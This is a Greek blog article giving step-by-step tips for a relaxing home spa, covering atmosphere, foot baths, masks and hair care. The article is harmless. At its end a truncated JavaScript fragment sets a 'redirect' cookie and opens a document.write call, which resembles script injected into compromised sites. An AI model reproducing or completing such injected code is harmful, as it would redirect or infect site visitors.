Φτιάξτε το δικό σας home spa

Κυριακή σήμερα, ημέρα χαλάρωσης και ανανέωσης! Μια καλή ιδέα ειναι να αφιερώσετε λίγο χρόνο στον εαυτό σας αναβαθµίζοντας µπάνιο σας σε home spa!

Η διαδικασία είναι πολύ πιο εύκολη απο ότι νομίζετε!

Φτιάξτε ατµόσφαιρα: Είναι το πρώτο και πολύ σηµαντικό βήµα για την απόλαυση που θα ακολουθήσει. Τακτοποιηµένος χώρος, απαλές, καθαρές πετσέτες και µπουρνούζι, χαµηλός φωτισµός (κατά προτίµηση από κεριά) και µυρωδιές που θα φτιάξουν τη διάθεσή σας, προετοιµάζουν συνολικά τις αισθήσεις, µεγιστοποιώντας τα οφέλη της θεραπείας.
Φροντίστε να βρίσκονται κοντά σας, όλα όσα χρειάζεστε: Όση καλή διάθεση κι αν έχετε, είναι σίγουρο πως το εγχείρηµα δεν θα σας µείνει τόσο αξέχαστο όσο θα θέλατε, αν γεµίσετε όλο το σπίτι νερά, επειδή ξεχάσατε στο δωµάτιο την πετσετούλα µε την οποία θα σκουπίζατε τα πόδια σας µετά το ποδόλουτρο.
Περιορίστε τους αντιπερισπασµούς: Γενικά, καλό θα είναι, εκτός από το 2ωρο που θα αφιερώσετε στον εαυτό σας, να έχετε φροντίσει ώστε να µην έχετε κάποια δουλειά µετά, και να ξεκουραστείτε όσο γίνεται περισσότερο, ακόµα και µέχρι το άλλο πρωί. Κατεβάστε τηλέφωνα (αν είναι εφικτό), ή έχετε κοντά τις συσκευές, ώστε να µην χρειάζεται να µετακινείστε. Ζητήστε από τους δικούς σας να µην σας ενοχλήσουν, και µεταφέρετε όποιες άλλες υποχρεώσεις έχετε για την επόµενη µέρα.
Ξεκινήστε από τα πόδια: Δεν χρειάζεται να έχετε ειδικές γνώσεις ρεφλεξολογίας για να απολαύσετε ένα καλό, αναζωογονητικό ποδόλουτρο. Χλιαρό νερό, µια χούφτα άλατα και το αγαπηµένο σας αφρόλουτρο, είναι ιδανικά για αρχή.
Ολοκληρώστε κάθε φάση χωριστά: Ξεκινήστε από τον καθαρισµό (απολέπιση σε πρόσωπο και σώµα, αφρόλουτρο, σαµπουάν), περάστε στις µάσκες (από µάσκα ποδιών, µέχρι µαλλιών και προσώπου, φορέστε τες µαζί, ώστε να υπολογίσετε καλύτερα το χρόνο που θα πρέπει να παραµείνουν), αφαιρέστε µε νερό κάτω από το ντους, και στη συνέχεια, αφού τυλίξετε τα µαλλιά σας µε µια πετσέτα, ξεκινήστε την περιποίηση (ενυδάτωση, θρέψη, αντιγήρανση ή ό,τι άλλο έχετε ανάγκη) σε πρόσωπο, σώµα και πόδια.
Τα µαλλιά στο τέλος: Ακούστε τις ανάγκες των µαλλιών σας, κυρίως αν συνηθίζετε να τα ταλαιπωρείτε καθηµερινά. Επιλέξτε κάποια leave-in (χωρίς ξέβγαλµα) θεραπεία για ενυδάτωση, ψαλίδα, ενίσχυση χρώµατος κλπ, βάλτε την στο τέλος και στη συνέχεια στεγνώστε τα ελαφρά µε το πιστολάκι, ή αφήστε τα να στεγνώσουν φυσικά. Αποφύγετε το στάιλιγκ και τις συνηθισµένες σας συνήθειες (π.χ. ίσιωµα) και επιτρέψτε στο τριχωτό να ξεκουραστεί, έστω και για µια µέρα.

Το τι ακριβώς θα περιλαµβάνει το δικό σας home spa έχει άµεση σχέση µε τις ανάγκες σας, τόσο σε πρακτικό επίπεδο (τι χρειάζεται το δέρµα, τα µαλλιά σας κλπ), όσο και σε ένα πιο υποκειµενικό επίπεδο. Απλά βρείτε αυτό που σας ευχαριστεί και απολαύστε το!

 

 

πηγή:lifepositive.gr
.getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply